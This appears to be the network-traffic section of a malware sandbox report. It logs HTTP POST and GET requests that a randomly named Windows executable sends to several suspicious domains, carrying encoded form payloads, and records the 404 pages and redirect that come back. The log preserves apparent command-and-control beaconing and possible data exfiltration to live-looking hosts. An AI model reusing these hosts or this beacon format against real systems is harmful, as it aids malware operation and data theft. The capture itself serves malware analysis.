                                                                                                                  Data Raw: 6e 56 3d 53 35 6e 4f 33 79 62 73 37 6d 73 36 54 36 68 73 63 39 2b 2f 34 38 77 71 70 4e 73 4b 50 54 32 6d 32 64 47 4a 2f 6e 73 51 54 79 62 57 4f 4e 53 72 6d 31 39 74 38 66 70 6f 41 73 68 54 2f 43 65 67 4d 7a 59 2b 65 66 70 77 46 5a 62 4d 31 50 51 66 43 6e 2b 4d 6c 42 53 77 2b 35 6a 31 73 41 6e 69 43 72 2b 42 41 34 57 36 61 47 68 45 6e 46 2b 55 6d 73 68 58 48 56 43 71 72 68 6e 5a 30 55 50 6d 4d 68 30 54 4f 2b 66 6e 51 37 49 72 44 68 63 45 6e 66 38 65 57 59 43 69 47 6e 32 68 74 6f 4e 6d 69 57 33 43 32 31 34 72 65 4c 38 76 31 6d 34 4c 44 42 61 4c 32 58 66 36 67 79 48 63 33 4a 46 6b 51 2b 6e 39 69 63 4f 6b 51 35 48 6d 66 68 39 38 56 6d 65 45 72 64 32 73 46 36 78 37
                                                                                                                  Data Ascii: nV=S5nO3ybs7ms6T6hsc9+/48wqpNsKPT2m2dGJ/nsQTybWONSrm19t8fpoAshT/CegMzY+efpwFZbM1PQfCn+MlBSw+5j1sAniCr+BA4W6aGhEnF+UmshXHVCqrhnZ0UPmMh0TO+fnQ7IrDhcEnf8eWYCiGn2htoNmiW3C214reL8v1m4LDBaL2Xf6gyHc3JFkQ+n9icOkQ5Hmfh98VmeErd2sF6x7
Oct 8, 2024 15:38:23.946433067 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 08 Oct 2024 13:38:23 GMT
                                                                                                                  Server: Apache
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Content-Length: 32106
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
Oct 8, 2024 15:38:23.946451902 CEST | 1236 | IN | Data Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                                                                                                  Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
Oct 8, 2024 15:38:23.946464062 CEST | 448 | IN | Data Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                                                                                                  Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
Oct 8, 2024 15:38:23.946588993 CEST | 1236 | IN | Data Raw: 74 68 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 66 61 62 6c 65 73 2d 74 6f 70 2d 68 65 61 64 65 72 2d 73 69 67 6e 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: th-background-color fables-top-header-signin"> <div class="container"> <div class="row" id="top-row"> <div class="col-12 col-sm-2 col-lg-5"> <div class="dropdown"> <button class="btn bt
Oct 8, 2024 15:38:23.946629047 CEST | 1236 | IN | Data Raw: 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 69 63 6f 6e 70 68 6f 6e 65 22 3e 3c 2f 73 70 61
                                                                                                                  Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconphone"></span> Phone : (888) 6000 6000 - (888) 6000 6000</p> </div> <div class="col-12 col-sm-5 col-lg-3 text-right"> <p class="fabl
Oct 8, 2024 15:38:23.946640015 CEST | 448 | IN | Data Raw: 6f 6e 20 74 65 78 74 2d 77 68 69 74 65 20 66 6f 6e 74 2d 31 36 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: on text-white font-16"></span> </button> <div class="collapse navbar-collapse" id="fablesNavDropdown"> <ul class="navbar-nav mx-auto fables-nav">
Oct 8, 2024 15:38:23.947055101 CEST | 1236 | IN | Data Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
Oct 8, 2024 15:38:23.947066069 CEST | 1236 | IN | Data Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                                                                                                                  Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
Oct 8, 2024 15:38:23.947081089 CEST | 1236 | IN | Data Raw: 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: ader2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
Oct 8, 2024 15:38:23.947089911 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 34 3c 2f 61 3e 0a
                                                                                                                  Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Header 4</a> <ul class="dropdown-menu"> <li><a class="drop
Oct 8, 2024 15:38:23.951884031 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 35 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e
                                                                                                                  Data Ascii: <li><a class="dropdown-item" href="header5-dark.html">Header 5 Dark</a></li> </ul> </li>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49982 | 67.223.117.189 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:38:25.930362940 CEST | 1749 | OUT | POST /iqqs/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.uburn.xyz
                                                                                                                  Origin: http://www.uburn.xyz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Referer: http://www.uburn.xyz/iqqs/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 53 35 6e 4f 33 79 62 73 37 6d 73 36 54 36 68 73 63 39 2b 2f 34 38 77 71 70 4e 73 4b 50 54 32 6d 32 64 47 4a 2f 6e 73 51 54 79 44 57 4f 65 4b 72 30 43 4a 74 37 66 70 6f 4e 4d 68 57 2f 43 65 48 4d 7a 67 36 65 66 74 4b 46 66 66 4d 30 73 49 66 4c 32 2b 4d 79 78 53 77 33 5a 6a 34 68 67 6d 2f 43 71 53 46 41 34 6d 36 61 47 68 45 6e 47 6d 55 69 39 68 58 4c 31 43 74 6f 68 6e 64 2b 30 4f 50 4d 6c 59 74 4f 39 79 61 51 4c 6f 72 44 42 73 45 72 4e 55 65 55 34 43 67 53 48 33 6d 74 6f 78 50 69 57 71 39 32 31 6c 4d 65 4c 55 76 30 69 49 49 54 41 71 64 70 55 65 59 72 7a 4c 50 6d 73 78 78 51 4f 66 6c 6f 50 57 35 58 35 76 7a 4a 32 56 62 64 31 48 4c 2b 5a 7a 32 41 74 6c 33 70 36 77 61 76 6f 72 71 32 70 49 73 68 66 4b 36 55 70 53 53 4f 55 65 72 59 4e 62 4d 56 57 57 74 36 38 66 64 6c 64 50 2b 49 73 78 46 64 50 68 65 4f 5a 57 6f 6d 41 78 30 2b 76 65 68 65 51 2f 73 32 71 79 34 31 37 64 32 45 58 4f 69 4a 78 31 31 6e 53 35 66 52 50 79 53 66 31 42 6a 57 49 59 32 50 50 33 77 55 64 48 4a 55 56 43 7a 30 31 4e 55 59 77 70 [TRUNCATED]
                                                                                                                  Data Ascii: nV=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 [TRUNCATED]
Oct 8, 2024 15:38:26.501810074 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 08 Oct 2024 13:38:26 GMT
                                                                                                                  Server: Apache
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Content-Length: 32106
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
Oct 8, 2024 15:38:26.501868010 CEST | 1236 | IN | Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
Oct 8, 2024 15:38:26.501885891 CEST | 1236 | IN | Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
Oct 8, 2024 15:38:26.501909971 CEST | 1236 | IN | Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
Oct 8, 2024 15:38:26.501928091 CEST | 896 | IN | Data Ascii: <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" da
Oct 8, 2024 15:38:26.502152920 CEST | 1236 | IN | Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
Oct 8, 2024 15:38:26.502182007 CEST | 1236 | IN | Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
Oct 8, 2024 15:38:26.502198935 CEST | 448 | IN | Data Ascii: ader2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
Oct 8, 2024 15:38:26.502243042 CEST | 1236 | IN | Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
Oct 8, 2024 15:38:26.502258062 CEST | 224 | IN | Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
Oct 8, 2024 15:38:26.506917000 CEST | 1236 | IN | Data Ascii: </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 5</a> <ul class="dropdown-menu">


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49983 | 67.223.117.189 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:38:28.472740889 CEST | 467 | OUT | GET /iqqs/?nV=f7Pu0FXPylRYdptnYM+M274MvaQkI0mPgPaD0QQYagT1MtyUkVhu56FZSrYHt1j8AD8LTP1JVeTQ4dQlBUKb6i2E7evasg+rZKL8K5GvfkdXq3aEhfRhQBOeogOLhyWDdw==&ntHx=DVDDWR70P4Ux HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Host: www.uburn.xyz
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 8, 2024 15:38:29.065129995 CEST | 1236 | IN | HTTP/1.1 404 Not Found
  Date: Tue, 08 Oct 2024 13:38:28 GMT
  Server: Apache
  X-Frame-Options: SAMEORIGIN
  Content-Length: 32106
  X-XSS-Protection: 1; mode=block
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
Oct 8, 2024 15:38:29.065192938 CEST | 1236 | IN | Data Ascii: strap.min.css" rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL
Oct 8, 2024 15:38:29.065254927 CEST | 1236 | IN | Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="
Oct 8, 2024 15:38:29.065289974 CEST | 1236 | IN | Data Ascii: mg src="assets/custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/ima
Oct 8, 2024 15:38:29.065440893 CEST | 1236 | IN | Data Ascii: "> <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" t
Oct 8, 2024 15:38:29.065500975 CEST | 1236 | IN | Data Ascii: <li><a class="dropdown-item" href="home2.html">Home 2</a></li> <li><a class="dropdown-item" href="home3.html">Home 3</a></li>
Oct 8, 2024 15:38:29.065536976 CEST | 1236 | IN | Data Ascii: <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li> <li><a class="dropdown-item" href="header1-light.
Oct 8, 2024 15:38:29.065566063 CEST | 108 | IN | Data Ascii: /li> </ul>
Oct 8, 2024 15:38:29.065598965 CEST | 1236 | IN | Data Ascii: </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
Oct 8, 2024 15:38:29.065635920 CEST | 1236 | IN | Data Ascii: ader 4 Light</a></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
Oct 8, 2024 15:38:29.070810080 CEST | 1236 | IN | Data Ascii: rs</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49984 | 3.33.130.190 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:38:42.277132988 CEST | 715 | OUT | POST /eruc/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Host: www.o731lh.vip
  Origin: http://www.o731lh.vip
  Connection: close
  Cache-Control: max-age=0
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 203
  Referer: http://www.o731lh.vip/eruc/
  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
  Data Ascii: nV=5rvH253M/d+aurAl6TW6OC4a+yRQCXuYf3IZqA2Q15JaeQIJbcVp+0AP+n+ZfbpWxVWu+vVRRiYlw723ctaxYno/To4PbAAxpBm1n2cO48xqFfxTk4P4zc2qWFcgdR6WDwybQ4YuUpQkAKdhdBya69R/lRKtz4hJqiJLH2SieAPZhjG9HYW9TnMrRzeKRad8Yp9KVEY=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49985 | 3.33.130.190 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:38:44.820225954 CEST | 735 | OUT | POST /eruc/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Host: www.o731lh.vip
  Origin: http://www.o731lh.vip
  Connection: close
  Cache-Control: max-age=0
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 223
  Referer: http://www.o731lh.vip/eruc/
  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
  Data Ascii: nV=5rvH253M/d+avIIlple6FC4Z0SRQYnucf3UZqEmA1L9ad0AJadVptEAPq3/SCrpNxVqM+upRRiMlw6G3deiyZ3o9aI4NVgAxpBm1n2Zr48ZqFvhTlZP/982rRFcgLR6sDwzOQ8YEUvMkAIVhaVuZz9R9vxLlyZQtjgJkAXHQfCDUkVrXd6eVAHgTBgW9Aq8VCKt6LTOXFxl9uD3VngItwOwQj4a8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49986 | 3.33.130.190 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:38:47.385597944 CEST | 1752 | OUT | POST /eruc/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Host: www.o731lh.vip
  Origin: http://www.o731lh.vip
  Connection: close
  Cache-Control: max-age=0
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 1239
  Referer: http://www.o731lh.vip/eruc/
  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49987 | 3.33.130.190 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:38:49.925474882 CEST | 468 | OUT | GET /eruc/?ntHx=DVDDWR70P4Ux&nV=0pHn1M2gwaL5mql+tyiDCW8+wEBXBUyoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJSHRFZ9VRSgAmugrmpHJKo8BhJN8eoKLjgrj/d04fMg3yYg== HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Host: www.o731lh.vip
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 8, 2024 15:38:50.414079905 CEST | 408 | IN | HTTP/1.1 200 OK
  Server: openresty
  Date: Tue, 08 Oct 2024 13:38:50 GMT
  Content-Type: text/html
  Content-Length: 268
  Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ntHx=DVDDWR70P4Ux&nV=0pHn1M2gwaL5mql+tyiDCW8+wEBXBUyoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJSHRFZ9VRSgAmugrmpHJKo8BhJN8eoKLjgrj/d04fMg3yYg=="}</script></head></html>


Session ID: 13, Source IP: 192.168.2.5, Source Port: 49988, Destination IP: 183.181.83.131, Destination Port: 80, PID: 4568, Process: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp: Oct 8, 2024 15:38:55.979124069 CEST, Bytes transferred: 733, Direction: OUT
POST /ui3j/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.nakama2-sshl.xyz
Origin: http://www.nakama2-sshl.xyz
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Referer: http://www.nakama2-sshl.xyz/ui3j/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Data Ascii: nV=Jx2AzDIVkhjYaai5rFcz6YFT60b3JX7L9vroXOaspEL0SgbThyN4jwr12EkjPO+QC6bTrGWgW7T9em1MeE9b0uXD+XEURZEaAMkQFkhJvYTnR/rZADRAfB1d0+sQW4lJENHAVbWdYQHeFW8DTk/CcF1Lf5bIw/M7zXqUKwC9nIlPPMkzbxm7IuiKOcnM7K021tjUyvI=
Timestamp: Oct 8, 2024 15:38:56.865907907 CEST, Bytes transferred: 1236, Direction: IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:38:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
